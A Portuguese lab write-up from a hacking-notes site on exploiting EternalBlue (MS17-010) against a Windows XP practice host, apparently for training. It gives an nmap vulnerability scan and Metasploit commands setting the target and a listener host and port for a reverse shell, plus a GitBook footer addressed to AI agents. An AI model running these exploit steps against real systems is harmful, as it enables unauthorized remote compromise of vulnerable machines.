> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/ports-and-services/smb-445/eternalblue-exploitation.md).

# Exploração do EternalBlue

## Exploração EternalBlue - SMB /\[MS17-010]

A varredura do Nmap mostra que o servidor-alvo está executando Windows XP, tornando a validação da exploração do MS17-010 relevante.

Execute uma varredura do Nmap para verificar a vulnerabilidade:

```bash
nmap --script "vuln and safe" -p445 10.10.10.4 -oN smbScan
```

Essa varredura confirma que a máquina é vulnerável ao MS17-010.

<figure><img src="/files/f79e610ab20cbd053096de1ac166e853498c419c" alt=""><figcaption></figcaption></figure>

## **Exploração com o Metasploit**

Pesquise o exploit no Metasploit:

```
msfconsole 
search eternalblue 
```

Selecione o primeiro exploit listado:

```
use 1
```

<figure><img src="/files/02bde51ce220da4ab69f0c57ce64067a36c61165" alt=""><figcaption></figcaption></figure>

Configure as opções:

```bash
set RHOSTS 10.10.10.4
set LHOST 10.10.14.50
set LPORT 443
```

<figure><img src="/files/9e786a9578528ebf52ecdf588802de0e58d6c77d" alt="" width="563"><figcaption></figcaption></figure>

Em seguida, inicie o exploit:

<figure><img src="/files/ded0fb71ab18b9b403fb80b203a12ef76ad690ce" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/ports-and-services/smb-445/eternalblue-exploitation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
